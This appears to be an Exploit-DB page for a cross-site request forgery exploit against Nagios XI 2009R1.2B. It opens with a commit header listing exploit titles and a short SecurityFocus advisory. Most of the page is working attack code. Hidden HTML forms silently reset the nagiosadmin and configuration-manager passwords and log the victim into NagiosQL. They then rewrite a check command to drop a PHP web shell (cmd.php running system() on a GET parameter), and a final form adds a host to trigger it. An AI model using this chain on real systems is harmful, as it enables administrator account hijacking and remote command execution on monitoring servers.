880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
142 lines
No EOL
6.8 KiB
HTML
142 lines
No EOL
6.8 KiB
HTML
source: https://www.securityfocus.com/bid/42322/info
|
|
|
|
Nagios XI is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.
|
|
|
|
Successful exploit requires that the 'nagiosadmin' be logged into the web interface.
|
|
|
|
Attackers can exploit these issues to gain unauthorized access to the affected application and perform certain administrative actions.
|
|
|
|
Nagios XI 2009R1.2B is vulnerable; other versions may also be affected.
|
|
|
|
Reset the nagiosadmin password via CSRF
|
|
|
|
This can be useful to hijack the administrators account.
|
|
<input type='button' id='adminpassword' value='Set nagiosadmin Password'/>
|
|
<form name="adminpasswordform"
|
|
action="http://www.example.com/nagiosxi/account/main.php?page=acctinfo"
|
|
method="POST" target="hidden" class="invisible">
|
|
<input type="input" name="defaultDateFormat" value="1" />
|
|
<input type="input" name="defaultLanguage" value="en" />
|
|
<input type="input" name="defaultNumberFormat" value="1" />
|
|
<input type="input" name="defaultTheme" value="none" />
|
|
<input type="input" name="email" value="adam@ngenuity-is.com" />
|
|
<input type="input" name="name" value="Nagios Administrator" />
|
|
<input type="input" name="password1" value="letmein1" />
|
|
<input type="input" name="password2" value="letmein1" />
|
|
<input type="input" name="update" value="1" />
|
|
</form>
|
|
|
|
|
|
Reset the configuration manager password
|
|
|
|
The attacker just has the victim visit the following URL. Even if the
|
|
nagios admin is not logged into the configuration admin, the attacker can…
|
|
|
|
1. Force a password reset of the configuration manager
|
|
2. Log the nagiosadmin into the configuration manager
|
|
3. Create a simple web shell on the nagios server.
|
|
|
|
http://www.example.com/nagiosxi/admin/credentials.php?options=1
|
|
&update=1
|
|
&config_admin_password=letmein1
|
|
&subsystem_ticket=2objrv9t6glq
|
|
&config_backend_password=38ajpt
|
|
|
|
Log into the configuration manager with previously set password
|
|
|
|
<input type='button' id='login' value='Login to Config Manager' />
|
|
<form name='loginform' action="http://www.example.com/nagiosql/index.php"
|
|
method="POST" target="hidden" class="invisible">
|
|
<input type="input" name="Submit" value="Login"/>
|
|
<input type="input" name="tfPassword" value="letmein1"/>
|
|
<input type="input" name="tfUsername" value="nagiosadmin"/>
|
|
</form>
|
|
|
|
Modify nagios command to create a webshell when run
|
|
|
|
Note the \ before the ; in our php code is what makes this possible.
|
|
Normally Nagios would not allow for a ; to be input into the command
|
|
string unless escaped. PHP will happily still execute this code despite
|
|
the \ being there.
|
|
|
|
<input type='button' id='modifycmd' value='Create Web Shell Command' />
|
|
<form name='modifycmdform'
|
|
action="http://www.example.com/nagiosql/admin/checkcommands.php"
|
|
method="POST" target="hidden" class="invisible">
|
|
<input type="input" name="chbActive" value="1"/>
|
|
<input type="input" name="hidActive" value=""/>
|
|
<input type="input" name="hidId" value="3"/>
|
|
<input type="input" name="hidLimit" value="0"/>
|
|
<input type="input" name="modus" value="modify"/>
|
|
<input type="input" name="selCommandType" value="1"/>
|
|
<input type="input" name="tfCommand"
|
|
value='/bin/echo "<pre><?php echo system(\$$_GET[\"c\"])\; ?>
|
|
</pre>" > /usr/local/nagiosxi/html/cmd.php' />
|
|
<input type="input" name="tfName" value="check-host-alive"/>
|
|
</form>
|
|
|
|
Add a Host to make sure our command is triggered, and the web shell created.
|
|
|
|
Yes this is a long and boring form…
|
|
|
|
<form name='addhostform' action='http://www.example.com/nagiosql/admin/hosts.php'
|
|
method='POST' target='hidden' class='invisible'>
|
|
<input type="input" name="chbActive" value="1"/>
|
|
<input type="input" name="hidActive" value=""/>
|
|
<input type="input" name="hidId" value=""/>
|
|
<input type="input" name="hidLimit" value="0"/>
|
|
<input type="input" name="hidName" value=""/>
|
|
<input type="input" name="modus" value="insert"/>
|
|
<input type="input" name="radActiveChecksEnabled" value="2"/>
|
|
<input type="input" name="radContactGroups" value="1"/>
|
|
<input type="input" name="radContacts" value="1"/>
|
|
<input type="input" name="radEventEnable" value="2"/>
|
|
<input type="input" name="radFlapEnable" value="2"/>
|
|
<input type="input" name="radFreshness" value="2"/>
|
|
<input type="input" name="radHostGroups" value="2"/>
|
|
<input type="input" name="radNoStatusInfos" value="2"/>
|
|
<input type="input" name="radNotifEnabled" value="2"/>
|
|
<input type="input" name="radObsess" value="2"/>
|
|
<input type="input" name="radParent" value="2"/>
|
|
<input type="input" name="radPassiveChecksEnabled" value="2"/>
|
|
<input type="input" name="radPerfData" value="2"/>
|
|
<input type="input" name="radStatusInfos" value="2"/>
|
|
<input type="input" name="selCheckPeriod" value="0"/>
|
|
<input type="input" name="selEventHandler" value="0"/>
|
|
<!-- Command we overwrote -->
|
|
<input type="input" name="selHostCommand" value="3"/>
|
|
<input type="input" name="selNotifPeriod" value="3"/>
|
|
<input type="input" name="selTemplate" value="2::1"/>
|
|
<input type="input" name="tfActionURL" value=""/>
|
|
<input type="input" name="tfAddress" value="4.2.2.2"/>
|
|
<input type="input" name="tfArg1" value=""/>
|
|
<input type="input" name="tfArg2" value=""/>
|
|
<input type="input" name="tfArg3" value=""/>
|
|
<input type="input" name="tfArg4" value=""/>
|
|
<input type="input" name="tfArg5" value=""/>
|
|
<input type="input" name="tfArg6" value=""/>
|
|
<input type="input" name="tfArg7" value=""/>
|
|
<input type="input" name="tfArg8" value=""/>
|
|
<input type="input" name="tfCheckInterval" value=""/>
|
|
<input type="input" name="tfD2Coords" value=""/>
|
|
<input type="input" name="tfD3Coords" value=""/>
|
|
<input type="input" name="tfDisplay" value=""/>
|
|
<input type="input" name="tfFirstNotifDelay" value=""/>
|
|
<input type="input" name="tfFreshTreshold" value=""/>
|
|
<input type="input" name="tfFriendly" value="testpwn"/>
|
|
<input type="input" name="tfGenericName" value=""/>
|
|
<input type="input" name="tfHighFlat" value=""/>
|
|
<input type="input" name="tfIconImage" value=""/>
|
|
<input type="input" name="tfIconImageAlt" value=""/>
|
|
<input type="input" name="tfLowFlat" value=""/>
|
|
<input type="input" name="tfMaxCheckAttempts" value="5"/>
|
|
<input type="input" name="tfName" value="testpwn"/>
|
|
<input type="input" name="tfNotes" value=""/>
|
|
<input type="input" name="tfNotesURL" value=""/>
|
|
<input type="input" name="tfNotifInterval" value="0"/>
|
|
<input type="input" name="tfRetryInterval" value=""/>
|
|
<input type="input" name="tfStatusImage" value=""/>
|
|
<input type="input" name="tfVmrlImage" value=""/>
|
|
<input type="input" name="txtVariablename" value=""/>
|
|
<input type="input" name="txtVariablevalue" value=""/>
|
|
</form> |